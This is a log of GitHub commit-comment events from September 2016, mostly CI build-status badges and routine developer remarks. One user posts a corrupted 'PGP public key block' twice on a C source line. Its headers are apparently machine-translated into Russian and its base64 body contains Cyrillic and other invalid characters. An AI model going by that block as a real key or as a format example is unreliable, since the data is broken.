{"id":"4537348357","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18955382,"position":null,"line":null,"path":null,"commit_id":"de88f6a99d8546ace57ef63e9538e656fcf84ab2","created_at":"2016-09-08T23:51:32Z","updated_at":"2016-09-08T23:51:32Z","body":"iteration (Unknown) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2359 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.36%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T23:51:32Z"}
{"id":"4537349414","type":"CommitCommentEvent","actor":{"login":"chriscoey"},"repo":{"name":"mlubin/Pajarito.jl"},"payload":{"comment":{"id":18955386,"position":48,"line":674,"path":"src/conic_algorithm.jl","commit_id":"12ce88f6caf0cc23a24484fa91a37fc228c111ed","created_at":"2016-09-08T23:51:54Z","updated_at":"2016-09-08T23:51:54Z","body":"that's just in case we decide we want to compare with cuts on nondisaggregated variables. unlikely but I'll leave it there for a few more days before I do a final 0.3 clean up"}},"created_at":"2016-09-08T23:51:54Z"}
{"id":"4537364637","type":"CommitCommentEvent","actor":{"login":"RenatoJardimParducci"},"repo":{"name":"RenatoJardimParducci/Teste3SIR"},"payload":{"comment":{"id":18955421,"position":null,"line":null,"path":null,"commit_id":"1c246a9721601164fe472f4aabae80431ccdbcc9","created_at":"2016-09-08T23:57:01Z","updated_at":"2016-09-08T23:57:01Z","body":"PPT Alterado"}},"created_at":"2016-09-08T23:57:01Z"}
{"id":"4537365042","type":"CommitCommentEvent","actor":{"login":"RenatoJardimParducci"},"repo":{"name":"RenatoJardimParducci/Teste3SIR"},"payload":{"comment":{"id":18955422,"position":null,"line":null,"path":null,"commit_id":"1c246a9721601164fe472f4aabae80431ccdbcc9","created_at":"2016-09-08T23:57:09Z","updated_at":"2016-09-08T23:57:09Z","body":"PPT alterado"}},"created_at":"2016-09-08T23:57:09Z"}
{"id":"4537365716","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18955424,"position":null,"line":null,"path":null,"commit_id":"de88f6a99d8546ace57ef63e9538e656fcf84ab2","created_at":"2016-09-08T23:57:22Z","updated_at":"2016-09-08T23:57:22Z","body":"iteration (Unknown) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-08T23:57:22Z"}
{"id":"4537366033","type":"CommitCommentEvent","actor":{"login":"ninaholic"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18955425,"position":null,"line":null,"path":null,"commit_id":"113c206fa5f5f7352a404feb7d151bbbeef0abe9","created_at":"2016-09-08T23:57:27Z","updated_at":"2016-09-08T23:57:27Z","body":"Oh nevermind. I think I found the answer. :laughing: \r\n\r\nhttp://www.murga-linux.com/puppy/viewtopic.php?p=871891#871891\r\nhttps://www.kernel.org/pub/linux/utils/util-linux/v2.22/v2.22-ReleaseNotes\r\nhttps://github.com/puppylinux-woof-CE/woof-CE/issues/789#issuecomment-243450587"}},"created_at":"2016-09-08T23:57:27Z"}
{"id":"4537367798","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":18955430,"position":44,"line":44,"path":"src/System.Data.SqlClient/tests/StressTests/System.Data.SqlClient.Stress.Tests/project.json","commit_id":"d20732880dce6aec39a97c1dbe335c46a7cfdcd5","created_at":"2016-09-08T23:58:02Z","updated_at":"2016-09-08T23:58:02Z","body":"This just broke the CI, looks like you raced with @mellinoe's change https://github.com/dotnet/corefx/commit/9447d75da2117e577e6a8549cb679e77207d5a26."}},"created_at":"2016-09-08T23:58:02Z"}
{"id":"4537371127","type":"CommitCommentEvent","actor":{"login":"ejgallego"},"repo":{"name":"ejgallego/HoTT"},"payload":{"comment":{"id":18955437,"position":null,"line":null,"path":null,"commit_id":"fdd707b71c0d59b8ccb37deb3bf70d1aac657b34","created_at":"2016-09-08T23:59:10Z","updated_at":"2016-09-08T23:59:10Z","body":"@spitters , as this was pushed to 8.7 the branch changed: https://github.com/ejgallego/coq/tree/coqlib-cleanup-master I'm afraid that sadly no more work will happen here until 8.6 is out of the door, I am mildly hopeful that a solution could be reached for 8.7."}},"created_at":"2016-09-08T23:59:10Z"}
{"id":"4537372419","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18955438,"position":9,"line":10,"path":"src/System.Security.Cryptography.Csp/ref/System.Security.Cryptography.Csp.csproj","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-08T23:59:34Z","updated_at":"2016-09-08T23:59:34Z","body":"Just as FYI, I'm about to merge dotnet/corefx#11493 which will update the package dependencies so you won't need this anymore."}},"created_at":"2016-09-08T23:59:34Z"}
{"id":"4531529491","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939031,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:00:19Z","updated_at":"2016-09-08T03:00:19Z","body":"@ApacheThunder\r\n\r\nSo... I seem to have a problem with this code...\r\n\r\nIt compiles and runs without error but I'm assuming that fatInitDefault isn't finding a card since nothing is written to the Slot-1 SD...\r\n\r\nAny thoughts?\r\n\r\nSlot-1 still boots..."}},"created_at":"2016-09-08T03:00:19Z"}
{"id":"4531529721","type":"CommitCommentEvent","actor":{"login":"romeo27091985"},"repo":{"name":"anselmolsm/soletta-machine-learning"},"payload":{"comment":{"id":18939032,"position":3,"line":47,"path":"soletta_module/sml_garden/sml_garden.c","commit_id":"138618b1cf93bcec2f65ca72de9e0aad1aa26be7","created_at":"2016-09-08T03:00:24Z","updated_at":"2016-09-08T03:00:24Z","body":"НАЧАТЬ С ОТКРЫТЫМ КЛЮЧОМ PGP БЛОК-----\r\nВерсия: v2 с помощью gnupg\r\n\r\nmQENBE0ti4EBCACqGtKlX9jI/enhlBdy2cyQP6Q7JoyxtaG6/ckAKWHYrqFTQk3I\r\nUe8TuDrGT742XFncG9PoMBfJDUNltIPgkfn8e9tyqqaolpsa25bob30ca2adkrjg\r\njvDAH8cZ+fkIayWtObTxwqLfPivjFxEM//IdShFFVQj+QHmXYBJggWyEIil8Bje7\r\nKRw6B5ucs4qSzp5VH4CqDr9PDnLD8lBGhk0x8jpwh4v/yEODJKATY0Vj00793L8u\r\nqA35ZiyczUvvJSLYvf7STO943GswkxdAfqxxbyifik2gje/7SAmB+2jFxsonUDOB\r\n1BAY5s3FKqrkaxZr3BBjeuGGoCuiSX/cXRIhABEBAAG0Fldlcm5lciBLb2NoIChk\r\naXN0IHNpZymJAT4EEwECACgFAk0ti4ECgwmfcrddnwigcwkibwmcbhuiagkkcwqw\r\nAgMBAh4BAheAAAoJECSbOdJPJeO2PlMIajxptfxf5yozppfjrbsksdjsk9eru05s\r\nhKZOAKw3RUePTU80SRLPdg4AH+vkm1JMWFFpwvHlgfxqnE9rp13o7L/4UwNUwqH8\r\n5zCwu7SHz9cX3d4UUwzcP6qQP4BQEH9/xlpQS9eTK9b2RMyggqwd/J8mxjvoWzL8\r\nКлф/wl6jXHn/yP92xG9/YA86lNOL1N3/PhlZzLuJ6bdD9WzsEp/+kh3UDfjkIrOc\r\nWkqwupB+d01R4bHPu9tvXy8Xut8Sok2zku2xVkEOsv2txhbwuho2agc5pwdx6wgc\r\nE4F5XeCB/0ovao2/bk22w1TxzP6PMxo6sLkmaF6D0frhM2bl4c/uSsqInAQQAQIA\r\nBgUCTS2NBAAKCRBTtiDQHODGMEZPBACLmrmjpwmyvvi6x5n4nlwctxqwy+4ODx2i\r\nO9CtUM/F96YiPFlmgwsJUzyXLwALYk+shh83TjQLfjexohzS1O07DCZUy7Lsb9R7\r\nHbYJ1Yf/QcEykbiAW465CZb1BAOMR2HUODBTaABaidfnhmuzjtayz7y0kkrhax+В\r\nVS6kfnsFq5kBDQRUUF8HAQgAh1mo8r+kVWVTNsNlyurm2tdZKiQbdeVgpBgcDnqi\r\n3fAV58C3nC8DVuK5qVGZPB/jbu42jc8BXGP1l6UP+515LQL5GpTtV0pRWUO02WOu\r\nTLZBVQcq53vzbg1xVo31rWV96mqGAPs8lgucm09fpuivkqojo6/Ihkg7/bnzeSbc\r\nX5Xk9eKLhyB7tnakuYJeRYm4bjs+YDApK8IFQyevYF8pjTcbLTSNJPW9WLCsozsy\r\n11r4xdfRcTWjARVz5VzTnQ+Px8YtsnjQ3qwNJBpsqMLCdDN7YGhh/mlwPjgdq/УФ\r\nф5+bY6f3ew0vshBqInBQycBSmYyoX0Ye3sAs/OR4nu5ZaQARAQABtD5EYXZpZCBT\r\naGF3IChHbnVQRyBSZWxlYXNlIFNpZ25pbmcgs2v5ksa8zhnoyxdaamfiymvyd29j\r\na3kuY29tPokBPgQTAQIAKAUCVFBfBwIbawujcbp27gylcqghawigfqgccqolbbyc\r\nAwECHgECF4AACgkQBDdvPuCFaVmIoQf+POxCWkCTicRVlq0kust/iwYO1egK9FWG\r\n130e2Irnv2lAZZN/0S5ibjHCYFp9gfMgmtVTF5oWXjSDAy/kIykQBBcUVx4SCJbd\r\nMtKSdsSIQMz6P4DxXumxQm79msOsbi5Tsdtuwjqdrbu2shloe7ck/hTXUCkX3zuq\r\ntxY7W23BCQxVVT5qUaFuAHkkQaaBgAb8gdgixmkibfu9u8k3k9zukm/PNfMjxClv\r\nORkP8gev+XyzNgcXM49h5YYlmDT+Ahv99nUM1wg8yJTjefBAY0fL982Scx30ndqo\r\n3w7ihALUoj5+TXQjhs3sWPJ8u3pstr9XcfzEZC77/CZmRYNr8g5hBokBHAQQAQgA\r\nBgUCVFOBbwAKCRAkmznSTyXjtmHeB/0X00v959Oyc0EsSLOlfC52qsEn5cU7vxfb\r\n+KY9aKtG4+hApJxemkqpCgA5+xZwXp3SQOf0sYFwz5OsukIjRF0HgSEdjomth6b7\r\nlT0nCwKo8AMU0nJbopVIJikHOzk2gUqh1gxu5iml1rbskmfhigjyeqm+ONQynCeX\r\nGg3LLZCQ1eeoaX69bvbWQFDtTIn2HYvjzljugc6pgh/naZ7GchiiiK0bs4UOdJFX\r\nHtITC/7DcgEiHMHOMT3XlwINTexZG0grl2LuWuyyhurjh5io6gearpkumr8sjjjv\r\nazpwbutZhYjTzfUpPvKK8kCSan9Df5eeekdrkcu8x8aqldvyoqcrmqenbfrqoymb\r\nCADmEHA30Xc6op/72ZcJdQMriVvnAyN22L3rEbTiACfvBajs6fpzme2ujlc5f1hk\r\nYdx3DvdcLoIV6Ed6j95JViJaoE0EB8T1tnuqrl5xj7japopvpyqerf3vreydcdir\r\numlEb8zCQvVTICsIYYAo3oxX/З/M7ogZDDeOe1G57f/Y8YacZqKw0AqW+20dZn3W\r\n7Lgpjl8EzX25AKBl3Hi/з+с/T7JCqxZPAlQq/KbHkYh81oIm+AX6/5о+vCynEEx/\r\n2OkdeoNeeHgujwL8axAwPoYKVV9COy+/NQcofZ6gvig1+S75RrkG4AdiL64C7OpX\r\n1N2kX08KlAzI9+65lyUw8t0zABEBAAG0Mk5JSUJFIFl1dGfrysaor251uecgumvs\r\nZWFzZSBLZXkpIDxnbmlpYmVAZnNpai5vcmc+iQE8BBMBCAAmBQJUUDsjAhsDBQkD\r\nwmcABQsHCAkDBBUICQoFFgIDAQACHgECf4aacgkqihgwijo9pwz1/wgA0LKal1wF\r\nZa8FPUonc2GzwE9YhkZiJB8KA/a7T6//cW4N46/GswiqZJxN1RdKs1B+rp7EMMU3\r\nbhoXstLBcIYveljqh4lPBWCsTT2+/OpwAmgnzjgdTHcpnCMTEOdZktD5SKrTj2tv\r\naWXAlWK/UsEEanA3cvzofy44n7rm+Eoa7P1YGCHL++Ihsi66ElbehilTT/xxckHX\r\nUji1XDvoagEENEHk5j4Z2mhWtjnGclvuibks4xezeznmw/fPAypZX4bkURNbGd8j\r\ntkb3Eqt+БВ+ZQoSA+Ukv8APaAzj8lRSw+CYjDxpoM0jtmiPrk+ед/Do46COVA/IX2\r\n2aYNT2Y2KoWJV4kBHAQQAQgABgUCVFOChqakcrakmznstyxjtoihb/0ZE/ppI2Gc\r\nqDxSwPKkRkkoMD8oXdKkPxjUF2jgP+bceHKiz1F78cx/eZltB4av8OujO1IwqH2C\r\n0aVr46W3eSyIcpmmw6F9sjLcTfyZJfWJrvobb7wqskvww0ehfgngr6z+BA3ohjws\r\naCZtzzkH2gXI+EM7qaZozMw+eSkZ4qTE9B4/hkMZZpBO0oGy9PQzSlADGftyyuTt\r\noSUvepfs+EvYSddQ7skXWq0zePuOhng2Mppl690A+aTywyetbPvVeqjiAbI7NB5f\r\n8Tw7dk0Febe9NHvbwzgiStMPmIKrTcthvgiclbkzvmkbfwapxypdhflzalpdgxjt\r\nR31c0zNFBH68mQENBFRDqVIBCAC0k8eZkdmnqdmawolj/m62L2g8uXT/+/vAEGb1\r\nyaib09xI6tfGXzbqlDwrLIZcJsSIT/НТ/ajJnIVbc3137va4XbwMzsDpAMH4mmiT\r\noqk+izEChGm2knzrLwhoflR8aGsKL35QoZT/erdjfgPeCRLvf25fHsN2Jb0WIMzC\r\n56VkMeFoza+9HZ5hrkemmm+gPvIvhEUopxCyOS8mK5WjB4zzIdyDJfkqvphvafnp\r\n0N4LIsedKdyHcj/K3kY4Kejl99GW1z1snBgPamoN2/e52Pf6KTw2FjsSGZ72oalc\r\nrkBR4wacUizGxKcRD2Y6Xa0g9mwToWdNbqciii+uTzOzq1EDABEBAAG0IVdlcm5l\r\nciBLb2NoIChSZWxlYXNlIFNpZ25pbmcgs2v5kykbpqqtaqgajwucveopugibawuj\r\nC6oF9QULCQgHAgYVCAkKCwIEFgIDAQIeaqixgaakcrckhhscfv1g2ah7b/wIW6mV\r\nmTmzW2xc1q1MUdssExQBhEeONrbWJ/HiGZP/MaabgQ/+wZuThTAwfGM5zFQBOvrB\r\nOGURhINU6lYQlcOrVo+V8Z1mNQKFWaKxJaY5Ku1bB1OuX9FHLEimiboghu5fjjix\r\nBE8XrnvueejyFQ5g/uX2xcGgCWlMe49sR3K+lEl3n93xTmSNhP52r0gTjMjbqKWK\r\nUaIGJ5OcWSrvawdfqLXkxR8phq2AlHHEfxpczsop9mzirwyq5jcgggfp0lyxuw/Р\r\nnxFpOcrj45qufmyEL9QJKjBV5RaHJbqukefwuinpqtvuminqqxztsh5qxqp2tsup\r\nIeEi5RAoCwLJam8ziQEcBBABCAAGBQJUu4juaaojecsbodjpjeo2c+ч+wevKc8w\r\nbkWSoGOJiYDglVMJa4x5utgHyXP4Pyqeliq7yibfqq3yyou9rwrgxfvuofpxpx1e\r\nу/XtCGgw03r4HZhauauYe27IDpA5P/Go7+WqufT6gMBoZf/1cD2ykQZpFyszEKHf\r\nГ+BlzqPJcRaXy4+uQG3O+ЧД/R2eIGAJDao/AclJI+kfckeY5DzRTibPex+rGAkxZ\r\n8qHtlCb0WeUbL3mgl9f3LlbPH77w1on6xqqiaq+ОРВ/3CUOIhNI3lrGO7mIqhSC\r\n0н+rpqLHeVLpLkz0IFvsJOp9UOHDCA8oL0cqtjgp1pn7mukr9ncvtonun41japoo\r\n4ZaHe5Y0r5MIofSYjgRDt/rHAQQA0JkZeitcyQMqk2xGd/5mGoc4+YNwQo8OSmVw\r\nIvY8UAI3tBorhF6ha9niaqZU4vdldTnXmu0j1opckahogrpaovaezhyutf0f/15р\r\niAF5dkZQ6dsmXVUkPNYMZTpkc2nA+IACBiOmygGBkLFuXvHRW1i6SNz28iRH/UZc\r\nЫли/2iEAIIFWUJm0Jldlcm5lciBLb2NoIChkaxn0ihnpzykgpgrkowpuqgduds5v\r\nкмц+iLwEEwECACYCGwMGCwkIBwMCBBUCCAMEfgidaqieaqixgaucts2mtwujclro\r\nYQAKCRBTtiDQHODGMPB4A/0U1DJR9LbkWuBs8Ko6KJoKLMVI6iYNJBhatm3dxweu\r\nxA16eYDWW/b9Lk5KnjtSWuGOeqa7MCsXnkyHkO88KE9icm3mfnhffn2qagd/нрч\r\nl9MPsdOgf/ug7j72Alv2V8s28R10HTjfwySe/omXWwK3qn8ou6N7ID+EwCV7i2e2\r\nu5kBogQ1oh4eEQQA/pdK4Oafa1uDN7Cr5nss4bNpg8YUSg01Vvj08ktcedpcapau\r\n+NzaP3KD2ow74WU2gzP70s9uSGQ2Vie4Blvokaabhba/3ivBrg3ILFrxbOfmKQg8\r\nFhtncd/TBOwzfkkbxBNcVJuBPRtjZ3dlDbS4IPNsiiv2sucifqma8qngvwsaoirj\r\n90b2fzERCZkKtfkoyYA8fnNrBADhJ8Rmirkicndk3tzk04nu6o8fp3ptrmno7jlu\r\nvDfsEVsYRjyMbDnbnjCGu1PeFoP2HZ+H9lp4CaQbyjWh2JlvI9UOc72V16SFkV0r\r\n8k0euNQXHhhzXWIkfz4gwSbBkN2nO5+6cIVeKnsdyFYkQyVs+флопе q86/PMfjo7utyrc\r\nWLq1CAQAou3da1JR6+KJO4gUZVh2F1NoaVCEPAvlDhNV10/hwe5mS0kTjUJ1jMl5\r\n6mwAFvhFFF9saW+eAnrwIOHjopbdHrPBmTJlOnNMHVLJzFlqjihwrrzqyl8inu2m\r\nfarn9Mr28ut5BQmp0CnNEJ6hl0Cs7l2xagwftlek2ii144vk3fg0j1dlcm5lcibl\r\nb2NoIChnbnVwZyBzaWcpIDxkZDlqbkBnbnuub3jnpohhbbmragahaheabqkofif9\r\nBQJBvGheBgsJCAcDAgMVAgMDFgIBAh4Baaojegi3q4lxvi3nbjman01313ag0tgj\r\nrGUZtDlKYbmNIeMeAJ0UpVsjxpylBcSjspe8maki7hb2rw==\r\n=W3eM\r\n-----КОНЕЦ ОТКРЫТЫМ КЛЮЧОМ PGP БЛОК"}},"created_at":"2016-09-08T03:00:24Z"}
{"id":"4531532597","type":"CommitCommentEvent","actor":{"login":"LantaoJin"},"repo":{"name":"dianping/hadoop"},"payload":{"comment":{"id":18939036,"position":5,"line":109,"path":"hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/DFSConfigKeys.java","commit_id":"3e6a73ddc0c248b3cf9175473154e5e11ba78cb7","created_at":"2016-09-08T03:01:22Z","updated_at":"2016-09-08T03:01:22Z","body":"Wanna balancer to run faster? HDFS-8818 is the best patch for that."}},"created_at":"2016-09-08T03:01:22Z"}
{"id":"4531532857","type":"CommitCommentEvent","actor":{"login":"romeo27091985"},"repo":{"name":"anselmolsm/soletta-machine-learning"},"payload":{"comment":{"id":18939037,"position":2,"line":46,"path":"soletta_module/sml_garden/sml_garden.c","commit_id":"138618b1cf93bcec2f65ca72de9e0aad1aa26be7","created_at":"2016-09-08T03:01:30Z","updated_at":"2016-09-08T03:01:30Z","body":"\r\n\r\n[log.txt](https://github.com/anselmolsm/soletta-machine-learning/files/460763/log.txt)\r\n"}},"created_at":"2016-09-08T03:01:30Z"}
{"id":"4531532970","type":"CommitCommentEvent","actor":{"login":"danbucholtz"},"repo":{"name":"driftyco/ionic2-app-base"},"payload":{"comment":{"id":18939038,"position":16,"line":22,"path":"package.json","commit_id":"47923bc112d57af331ee0ad14c614133b19fb141","created_at":"2016-09-08T03:01:32Z","updated_at":"2016-09-08T03:01:32Z","body":"Hi @ZiFFeL1992,\r\n\r\nThanks!  I am not sure if we want to hide that one or not.  It's worth a discussion.  Thanks for checking out these commits!\r\n\r\nThanks,\r\nDan"}},"created_at":"2016-09-08T03:01:32Z"}
{"id":"4531535269","type":"CommitCommentEvent","actor":{"login":"fmapilis"},"repo":{"name":"theniall/baby-s-first-project"},"payload":{"comment":{"id":18939041,"position":null,"line":null,"path":null,"commit_id":"656a86e82ed3230d42451f72050410921f70561b","created_at":"2016-09-08T03:02:23Z","updated_at":"2016-09-08T03:02:23Z","body":"Amazing 💯 "}},"created_at":"2016-09-08T03:02:23Z"}
{"id":"4531536112","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18939043,"position":null,"line":null,"path":null,"commit_id":"39d26be21f1f398b638069bf97cdbfbf5222e296","created_at":"2016-09-08T03:02:42Z","updated_at":"2016-09-08T03:02:42Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-39d26be21f1f398b638069bf97cdbfbf5222e296-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-39d26be21f1f398b638069bf97cdbfbf5222e296-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T03:02:42Z"}
{"id":"4531539055","type":"CommitCommentEvent","actor":{"login":"thirstyice"},"repo":{"name":"Aberhart-school/abe-site"},"payload":{"comment":{"id":18939050,"position":null,"line":null,"path":null,"commit_id":"bbafa1173c282ea22ac77161df45e5a880a60680","created_at":"2016-09-08T03:03:49Z","updated_at":"2016-09-08T03:03:49Z","body":"close #184 "}},"created_at":"2016-09-08T03:03:49Z"}
{"id":"4531539736","type":"CommitCommentEvent","actor":{"login":"romeo27091985"},"repo":{"name":"anselmolsm/soletta-machine-learning"},"payload":{"comment":{"id":18939052,"position":null,"line":null,"path":null,"commit_id":"138618b1cf93bcec2f65ca72de9e0aad1aa26be7","created_at":"2016-09-08T03:04:06Z","updated_at":"2016-09-08T03:04:06Z","body":"НАЧАТЬ С ОТКРЫТЫМ КЛЮЧОМ PGP БЛОК-----\r\nВерсия: v2 с помощью gnupg\r\n\r\nmQENBE0ti4EBCACqGtKlX9jI/enhlBdy2cyQP6Q7JoyxtaG6/ckAKWHYrqFTQk3I\r\nUe8TuDrGT742XFncG9PoMBfJDUNltIPgkfn8e9tyqqaolpsa25bob30ca2adkrjg\r\njvDAH8cZ+fkIayWtObTxwqLfPivjFxEM//IdShFFVQj+QHmXYBJggWyEIil8Bje7\r\nKRw6B5ucs4qSzp5VH4CqDr9PDnLD8lBGhk0x8jpwh4v/yEODJKATY0Vj00793L8u\r\nqA35ZiyczUvvJSLYvf7STO943GswkxdAfqxxbyifik2gje/7SAmB+2jFxsonUDOB\r\n1BAY5s3FKqrkaxZr3BBjeuGGoCuiSX/cXRIhABEBAAG0Fldlcm5lciBLb2NoIChk\r\naXN0IHNpZymJAT4EEwECACgFAk0ti4ECgwmfcrddnwigcwkibwmcbhuiagkkcwqw\r\nAgMBAh4BAheAAAoJECSbOdJPJeO2PlMIajxptfxf5yozppfjrbsksdjsk9eru05s\r\nhKZOAKw3RUePTU80SRLPdg4AH+vkm1JMWFFpwvHlgfxqnE9rp13o7L/4UwNUwqH8\r\n5zCwu7SHz9cX3d4UUwzcP6qQP4BQEH9/xlpQS9eTK9b2RMyggqwd/J8mxjvoWzL8\r\nКлф/wl6jXHn/yP92xG9/YA86lNOL1N3/PhlZzLuJ6bdD9WzsEp/+kh3UDfjkIrOc\r\nWkqwupB+d01R4bHPu9tvXy8Xut8Sok2zku2xVkEOsv2txhbwuho2agc5pwdx6wgc\r\nE4F5XeCB/0ovao2/bk22w1TxzP6PMxo6sLkmaF6D0frhM2bl4c/uSsqInAQQAQIA\r\nBgUCTS2NBAAKCRBTtiDQHODGMEZPBACLmrmjpwmyvvi6x5n4nlwctxqwy+4ODx2i\r\nO9CtUM/F96YiPFlmgwsJUzyXLwALYk+shh83TjQLfjexohzS1O07DCZUy7Lsb9R7\r\nHbYJ1Yf/QcEykbiAW465CZb1BAOMR2HUODBTaABaidfnhmuzjtayz7y0kkrhax+В\r\nVS6kfnsFq5kBDQRUUF8HAQgAh1mo8r+kVWVTNsNlyurm2tdZKiQbdeVgpBgcDnqi\r\n3fAV58C3nC8DVuK5qVGZPB/jbu42jc8BXGP1l6UP+515LQL5GpTtV0pRWUO02WOu\r\nTLZBVQcq53vzbg1xVo31rWV96mqGAPs8lgucm09fpuivkqojo6/Ihkg7/bnzeSbc\r\nX5Xk9eKLhyB7tnakuYJeRYm4bjs+YDApK8IFQyevYF8pjTcbLTSNJPW9WLCsozsy\r\n11r4xdfRcTWjARVz5VzTnQ+Px8YtsnjQ3qwNJBpsqMLCdDN7YGhh/mlwPjgdq/УФ\r\nф5+bY6f3ew0vshBqInBQycBSmYyoX0Ye3sAs/OR4nu5ZaQARAQABtD5EYXZpZCBT\r\naGF3IChHbnVQRyBSZWxlYXNlIFNpZ25pbmcgs2v5ksa8zhnoyxdaamfiymvyd29j\r\na3kuY29tPokBPgQTAQIAKAUCVFBfBwIbawujcbp27gylcqghawigfqgccqolbbyc\r\nAwECHgECF4AACgkQBDdvPuCFaVmIoQf+POxCWkCTicRVlq0kust/iwYO1egK9FWG\r\n130e2Irnv2lAZZN/0S5ibjHCYFp9gfMgmtVTF5oWXjSDAy/kIykQBBcUVx4SCJbd\r\nMtKSdsSIQMz6P4DxXumxQm79msOsbi5Tsdtuwjqdrbu2shloe7ck/hTXUCkX3zuq\r\ntxY7W23BCQxVVT5qUaFuAHkkQaaBgAb8gdgixmkibfu9u8k3k9zukm/PNfMjxClv\r\nORkP8gev+XyzNgcXM49h5YYlmDT+Ahv99nUM1wg8yJTjefBAY0fL982Scx30ndqo\r\n3w7ihALUoj5+TXQjhs3sWPJ8u3pstr9XcfzEZC77/CZmRYNr8g5hBokBHAQQAQgA\r\nBgUCVFOBbwAKCRAkmznSTyXjtmHeB/0X00v959Oyc0EsSLOlfC52qsEn5cU7vxfb\r\n+KY9aKtG4+hApJxemkqpCgA5+xZwXp3SQOf0sYFwz5OsukIjRF0HgSEdjomth6b7\r\nlT0nCwKo8AMU0nJbopVIJikHOzk2gUqh1gxu5iml1rbskmfhigjyeqm+ONQynCeX\r\nGg3LLZCQ1eeoaX69bvbWQFDtTIn2HYvjzljugc6pgh/naZ7GchiiiK0bs4UOdJFX\r\nHtITC/7DcgEiHMHOMT3XlwINTexZG0grl2LuWuyyhurjh5io6gearpkumr8sjjjv\r\nazpwbutZhYjTzfUpPvKK8kCSan9Df5eeekdrkcu8x8aqldvyoqcrmqenbfrqoymb\r\nCADmEHA30Xc6op/72ZcJdQMriVvnAyN22L3rEbTiACfvBajs6fpzme2ujlc5f1hk\r\nYdx3DvdcLoIV6Ed6j95JViJaoE0EB8T1tnuqrl5xj7japopvpyqerf3vreydcdir\r\numlEb8zCQvVTICsIYYAo3oxX/З/M7ogZDDeOe1G57f/Y8YacZqKw0AqW+20dZn3W\r\n7Lgpjl8EzX25AKBl3Hi/з+с/T7JCqxZPAlQq/KbHkYh81oIm+AX6/5о+vCynEEx/\r\n2OkdeoNeeHgujwL8axAwPoYKVV9COy+/NQcofZ6gvig1+S75RrkG4AdiL64C7OpX\r\n1N2kX08KlAzI9+65lyUw8t0zABEBAAG0Mk5JSUJFIFl1dGfrysaor251uecgumvs\r\nZWFzZSBLZXkpIDxnbmlpYmVAZnNpai5vcmc+iQE8BBMBCAAmBQJUUDsjAhsDBQkD\r\nwmcABQsHCAkDBBUICQoFFgIDAQACHgECf4aacgkqihgwijo9pwz1/wgA0LKal1wF\r\nZa8FPUonc2GzwE9YhkZiJB8KA/a7T6//cW4N46/GswiqZJxN1RdKs1B+rp7EMMU3\r\nbhoXstLBcIYveljqh4lPBWCsTT2+/OpwAmgnzjgdTHcpnCMTEOdZktD5SKrTj2tv\r\naWXAlWK/UsEEanA3cvzofy44n7rm+Eoa7P1YGCHL++Ihsi66ElbehilTT/xxckHX\r\nUji1XDvoagEENEHk5j4Z2mhWtjnGclvuibks4xezeznmw/fPAypZX4bkURNbGd8j\r\ntkb3Eqt+БВ+ZQoSA+Ukv8APaAzj8lRSw+CYjDxpoM0jtmiPrk+ед/Do46COVA/IX2\r\n2aYNT2Y2KoWJV4kBHAQQAQgABgUCVFOChqakcrakmznstyxjtoihb/0ZE/ppI2Gc\r\nqDxSwPKkRkkoMD8oXdKkPxjUF2jgP+bceHKiz1F78cx/eZltB4av8OujO1IwqH2C\r\n0aVr46W3eSyIcpmmw6F9sjLcTfyZJfWJrvobb7wqskvww0ehfgngr6z+BA3ohjws\r\naCZtzzkH2gXI+EM7qaZozMw+eSkZ4qTE9B4/hkMZZpBO0oGy9PQzSlADGftyyuTt\r\noSUvepfs+EvYSddQ7skXWq0zePuOhng2Mppl690A+aTywyetbPvVeqjiAbI7NB5f\r\n8Tw7dk0Febe9NHvbwzgiStMPmIKrTcthvgiclbkzvmkbfwapxypdhflzalpdgxjt\r\nR31c0zNFBH68mQENBFRDqVIBCAC0k8eZkdmnqdmawolj/m62L2g8uXT/+/vAEGb1\r\nyaib09xI6tfGXzbqlDwrLIZcJsSIT/НТ/ajJnIVbc3137va4XbwMzsDpAMH4m